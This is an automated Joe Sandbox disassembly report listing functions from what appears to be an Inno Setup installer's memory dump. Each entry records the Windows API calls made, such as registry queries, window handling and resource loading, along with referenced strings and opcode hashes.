                                          • Opcode ID: 4322ea0ae6c7c29bca73c1464b3547e578e0cc1b6bec92805596b4911c6f8057
                                          • Instruction ID: 8f616a6be6905109681539d72543d9f9618ef45f44fc752795df2394f3282eaf
                                          • Opcode Fuzzy Hash: 4322ea0ae6c7c29bca73c1464b3547e578e0cc1b6bec92805596b4911c6f8057
                                          • Instruction Fuzzy Hash: B5F06D717041056AE700FBA6DD42BAE67E8EB4530AF60443BFC04A3293EA7C9D09852C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0
                                          • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004783E1
                                          • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00478404
                                          Strings
                                          • System\CurrentControlSet\Control\Windows, xrefs: 004783AE
                                          • CSDVersion, xrefs: 004783D8
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseD6790QueryValue
                                          • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                          • API String ID: 2325164195-1910633163
                                          • Opcode ID: f9b57a2cfb8dc9af6dc7d52a461c6cea895f1a241a33be6a6420614682ac17e1
                                          • Instruction ID: ebd8b9a797716e03103ab54bad31a22caa8a2566d27fddc08f785aad15fb8c36
                                          • Opcode Fuzzy Hash: f9b57a2cfb8dc9af6dc7d52a461c6cea895f1a241a33be6a6420614682ac17e1
                                          • Instruction Fuzzy Hash: 18F04975E40209A6DF10D6D18C49BDF73BC9B04714F1085ABE518E7281FA789A058B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,0045253A,00000000,004525DD,?,?,00000000,00000000,00000000,00000000,00000000,?,004528A9,00000000), ref: 0042D852
                                          • 6CAD5550.KERNEL32(00000000,kernel32.dll,GetSystemWow64DirectoryA,?,0045253A,00000000,004525DD,?,?,00000000,00000000,00000000,00000000,00000000,?,004528A9), ref: 0042D858
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550HandleModule
                                          • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                          • API String ID: 920177481-4063490227
                                          • Opcode ID: 65fc8540a33f14b19a2b60b840795894bc427e8aebf8dfd69cf8a53384edfe8d
                                          • Instruction ID: 2f3886f1a94a038449d10b3498d7127d8e9797a980d43385655fd77ae546b746
                                          • Opcode Fuzzy Hash: 65fc8540a33f14b19a2b60b840795894bc427e8aebf8dfd69cf8a53384edfe8d
                                          • Instruction Fuzzy Hash: 0FE02630F40B5422D31075BA1C8376F118D4B84764FA0053F7AA4E63C2EDBCCA400A6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0048B7DA,00000001,00000000,0048B7FE), ref: 0048B572
                                          • 6CAD5550.KERNEL32(00000000,user32.dll,DisableProcessWindowsGhosting,0048B7DA,00000001,00000000,0048B7FE), ref: 0048B578
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550HandleModule
                                          • String ID: DisableProcessWindowsGhosting$user32.dll
                                          • API String ID: 920177481-834958232
                                          • Opcode ID: ff3fd83ae6f82ac6f64e81510813527fd5869980979b22b6fcb549de794fba82
                                          • Instruction ID: b98143b08d5470dfc2a62f35b387981235197b5dc25cf883adaefec176bf8dcf
                                          • Opcode Fuzzy Hash: ff3fd83ae6f82ac6f64e81510813527fd5869980979b22b6fcb549de794fba82
                                          • Instruction Fuzzy Hash: 39B00280781A133C991072F24D56B1F4548CC9475DB251E673850F51C6DF6C89416EBE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00413E0E
                                          • GetDesktopWindow.USER32 ref: 00413EC6
                                            • Part of subcall function 00418F88: 6F7FB5E0.COMCTL32(00000000,?,00413EF6,?,?,?,?,00413BBB,00000000,00413BCE), ref: 00418FA4
                                            • Part of subcall function 00418F88: ShowCursor.USER32(00000001,00000000,?,00413EF6,?,?,?,?,00413BBB,00000000,00413BCE), ref: 00418FC1
                                          • SetCursor.USER32(00000000,?,?,?,?,00413BBB,00000000,00413BCE), ref: 00413F04
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CursorDesktopWindow$Show
                                          • String ID:
                                          • API String ID: 2074268717-0
                                          • Opcode ID: 6546559de08365ef47c6e7563df171fa08e100ddb20537a13f1ad1f73c073373
                                          • Instruction ID: f32426dca888e2d56ee745e629d979e7c9b3849a6447fc5aeac6aa2206e082a3
                                          • Opcode Fuzzy Hash: 6546559de08365ef47c6e7563df171fa08e100ddb20537a13f1ad1f73c073373
                                          • Instruction Fuzzy Hash: 80412C70E012109FC714FF29E9C5A9A7BE5AB45309B14887FE805CB3A5CB38EC81CB18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: LoadString$FileMessageModuleName
                                          • String ID:
                                          • API String ID: 704749118-0
                                          • Opcode ID: e0cc4281da798df7fe111bb9cd80f3001d0db584bc853989daa63a0f40e91ddb
                                          • Instruction ID: 44a86db057f9d63c56723edc699d4c9bad8178255c12b1c4832d910ab8f3ac03
                                          • Opcode Fuzzy Hash: e0cc4281da798df7fe111bb9cd80f3001d0db584bc853989daa63a0f40e91ddb
                                          • Instruction Fuzzy Hash: A93145706093805FE770EB65C945BDB77E89B86704F04483EB6C8EB2D2DB789904876B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OffsetRect.USER32(?,?,00000000), ref: 004885EC
                                          • OffsetRect.USER32(?,00000000,?), ref: 00488607
                                          • OffsetRect.USER32(?,?,00000000), ref: 00488621
                                          • OffsetRect.USER32(?,00000000,?), ref: 0048863C
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: OffsetRect
                                          • String ID:
                                          • API String ID: 177026234-0
                                          • Opcode ID: e930ae5f9c6793fa844807e4c318ccb697997ed23c9637388a8b9729ef4b8dee
                                          • Instruction ID: 5b824585aa51fb87f70f9c434e37a28c71bd38defd619a23ada872ee26880216
                                          • Opcode Fuzzy Hash: e930ae5f9c6793fa844807e4c318ccb697997ed23c9637388a8b9729ef4b8dee
                                          • Instruction Fuzzy Hash: 172160B67042056FC700EE69CC85E6FB7DAEBC4300F548A2EF944D724AEA34ED448765
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCursorPos.USER32 ref: 00417328
                                          • SetCursor.USER32(00000000), ref: 0041736B
                                          • GetLastActivePopup.USER32(?), ref: 00417395
                                          • GetForegroundWindow.USER32(?), ref: 0041739C
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Cursor$ActiveForegroundLastPopupWindow
                                          • String ID:
                                          • API String ID: 1959210111-0
                                          • Opcode ID: 2ee17bafeec45e60645a682f750ce4ef553eb04d9f4138f0cc99ea1327cdb86b
                                          • Instruction ID: bac7e200b11387e1ba21beeddde03211dbe408e99f5f69e57673f47c47d5fcf6
                                          • Opcode Fuzzy Hash: 2ee17bafeec45e60645a682f750ce4ef553eb04d9f4138f0cc99ea1327cdb86b
                                          • Instruction Fuzzy Hash: 04217F316092048AC710EF2AC845ADF33B1AB44764B46496EEC699B392E73DDC81D75D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • MulDiv.KERNEL32(8B500000,00000000,?), ref: 00488335
                                          • MulDiv.KERNEL32(50142444,00000008,?), ref: 00488348
                                          • MulDiv.KERNEL32(F7D483E8,00000000,?), ref: 00488364
                                          • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 0048838B
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 00410b4d8b0f69e6e5972e21e3cdbb834df30f1611a0f3f66f7c34ab6d2831f5
                                          • Instruction ID: 3251cc3186a811aa5037efa69265713b7995ec2fe77ecce64b3da02d6926583a
                                          • Opcode Fuzzy Hash: 00410b4d8b0f69e6e5972e21e3cdbb834df30f1611a0f3f66f7c34ab6d2831f5
                                          • Instruction Fuzzy Hash: 7B21B9B6A00105AFCB40DFADC884E9EB7FCAF0C314B504596B918DB246D674ED408B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Class$InfoLongRegisterUnregisterWindow
                                          • String ID:
                                          • API String ID: 4025006896-0
                                          • Opcode ID: 10a9a7078d67312e7ce8e8337c3ec44bd7b0364bdc37ad7fed2a3dd39bb75202
                                          • Instruction ID: c21b3c6f039f3a1543fbbeaf4668144afd44c643da5632c1bde523ec4f1d684a
                                          • Opcode Fuzzy Hash: 10a9a7078d67312e7ce8e8337c3ec44bd7b0364bdc37ad7fed2a3dd39bb75202
                                          • Instruction Fuzzy Hash: 7F012D71640104BBCF10EFA9EC81E9F3799A709318F00463AB905EB2E2D635E8159B68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindResourceA.KERNEL32(00400000,00000000,00000000), ref: 0040D2DF
                                          • LoadResource.KERNEL32(00400000,72756F73,0040AA80,00400000,00000001,00000000,?,0040D23C,00000000,?,?,00000000,?,00472220,0000000A,00000000), ref: 0040D2F9
                                          • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040AA80,00400000,00000001,00000000,?,0040D23C,00000000,?,?,00000000,?,00472220), ref: 0040D313
                                          • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040AA80,00400000,00000001,00000000,?,0040D23C,00000000,?,?,00000000), ref: 0040D31D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID:
                                          • API String ID: 3473537107-0
                                          • Opcode ID: 3bb43f5d52285fdfed78278d9ca77677ef357f628772948a1ed4c0710a20c811
                                          • Instruction ID: 542866f3073ff163a702ba7e2e3de952a852996e327bb70ca280f3e64d2c5601
                                          • Opcode Fuzzy Hash: 3bb43f5d52285fdfed78278d9ca77677ef357f628772948a1ed4c0710a20c811
                                          • Instruction Fuzzy Hash: CBF062B26056046F9708FE9D9881D5B77EDDE88264310007FF91CE7286DA38ED058B78
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0
                                          • 6CAD6690.ADVAPI32(?,00000000,?,00000002,00000000,?,?,00000000,004584F9), ref: 0045476C
                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,?,00000002,00000000,?,?,00000000,004584F9), ref: 00454775
                                          • RemoveFontResourceA.GDI32(00000000), ref: 00454782
                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00454796
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseD6690D6790FontMessageNotifyRemoveResourceSend
                                          • String ID:
                                          • API String ID: 911274636-0
                                          • Opcode ID: 37287cc32b2c29381a48a7316915b6ded4d7798c5ea5e6b1da3b2d3d66d5b5a8
                                          • Instruction ID: 2b422e65405ee2d92d30493631ccf6b7ae4006e84f62635805817285d1b95c04
                                          • Opcode Fuzzy Hash: 37287cc32b2c29381a48a7316915b6ded4d7798c5ea5e6b1da3b2d3d66d5b5a8
                                          • Instruction Fuzzy Hash: BBF030B2B4470136EA20B7B65C46F1B528C8F48788F14883EBA44EB1D2D67CD944966D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastActivePopup.USER32(?), ref: 00424314
                                          • IsWindowVisible.USER32 ref: 00424325
                                          • IsWindowEnabled.USER32(?), ref: 0042432F
                                          • SetForegroundWindow.USER32(?,?,?,?,?,00486518,00000000,00486C30), ref: 00424339
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                          • String ID:
                                          • API String ID: 2280970139-0
                                          • Opcode ID: d4c34c35976f1a4744d72fad739808c656fe72c1b6fedfe1ace3690ff732f2b4
                                          • Instruction ID: 093e33b802470a6257887afd832b24ea788dd3b2501e4f7f6a6e70dd687b8a9b
                                          • Opcode Fuzzy Hash: d4c34c35976f1a4744d72fad739808c656fe72c1b6fedfe1ace3690ff732f2b4
                                          • Instruction Fuzzy Hash: E4E08C61702635579A21B63A2982BDB95CD8D45344346007BBC50FB283DA2DDC1081FC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Global$AllocHandleWire
                                          • String ID:
                                          • API String ID: 2210401237-0
                                          • Opcode ID: 2ccb1316f656a9feec663ea7d40f446e50994104d6d7ba694866cbb55bb477a3
                                          • Instruction ID: 358e25fb7084f445ff186797d019571ee60d51755ee9ae5fd621e3f1806715ee
                                          • Opcode Fuzzy Hash: 2ccb1316f656a9feec663ea7d40f446e50994104d6d7ba694866cbb55bb477a3
                                          • Instruction Fuzzy Hash: 47B009E4961E0178ED4873B26C0FD3F387DD88870D38049AE3440BA497987CBC00883E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 00464321
                                          • EnableMenuItem.USER32 ref: 00464327
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Menu$EnableItemSystem
                                          • String ID: CurPageChanged
                                          • API String ID: 3692539535-2490978513
                                          • Opcode ID: ffd6a85f3733a3a3d420da159be494d14865ac897c70986fd094c254901061d2
                                          • Instruction ID: 46ec497cb3a8356c226a7c5266c94ca15ed80b02e01e615ee1c1d55c4ed561bc
                                          • Opcode Fuzzy Hash: ffd6a85f3733a3a3d420da159be494d14865ac897c70986fd094c254901061d2
                                          • Instruction Fuzzy Hash: 97A10638704204DFCB15DBA9D999AED73F5AB89304F2541F6F8049B362DB38AE41DB09
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047151F,?,00000000,00000000,00000001,00000000,00470005,?,00000000), ref: 0046FFC9
                                          Strings
                                          • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0046FE3D
                                          • Failed to parse "reg" constant, xrefs: 0046FFD0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Close
                                          • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                          • API String ID: 3535843008-1938159461
                                          • Opcode ID: 0a1d62dcc402932a6303958043aebf9e95749352cd083518649c1eb0e2dc5052
                                          • Instruction ID: 47136acb6e2bb56904c55ddf5f28219fb2777eb9605b9a5b61fca817b4fe90c1
                                          • Opcode Fuzzy Hash: 0a1d62dcc402932a6303958043aebf9e95749352cd083518649c1eb0e2dc5052
                                          • Instruction Fuzzy Hash: 69816071E001089FCB10EF95D481ADEBBF9AF48314F10817BE854A7396D739AE09CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Failed to proceed to next wizard page; aborting., xrefs: 00465CF4
                                          • Failed to proceed to next wizard page; showing wizard., xrefs: 00465D08
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                          • API String ID: 0-1974262853
                                          • Opcode ID: b8cf2fbb86ed8b2886ba9200a479e6093de5ea49a7fadad3ead1447514cfb89c
                                          • Instruction ID: c71bcc5f1162af886fc49a198fbb8a16c06835f0575393f154fbba21c83105a6
                                          • Opcode Fuzzy Hash: b8cf2fbb86ed8b2886ba9200a479e6093de5ea49a7fadad3ead1447514cfb89c
                                          • Instruction Fuzzy Hash: 9731CF30A00B44AFD700EFA5D985E9D77F4EB09714F6184BAF404AB391E738AE00DB1A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetActiveWindow.USER32 ref: 0045C05A
                                            • Part of subcall function 0041EF6C: GetCurrentThreadId.KERNEL32 ref: 0041EFBB
                                            • Part of subcall function 0041EF6C: 72E5AC10.USER32(00000000,0041EF1C,00000000,00000000,0041EFD8,?,00000000,0041F00F,?,00000000,00000000,021E2410), ref: 0041EFC1
                                          • 757DB9A0.COMDLG32(0000004C,00000000,0045C0C7,?,00000000,0045C0FB), ref: 0045C08F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
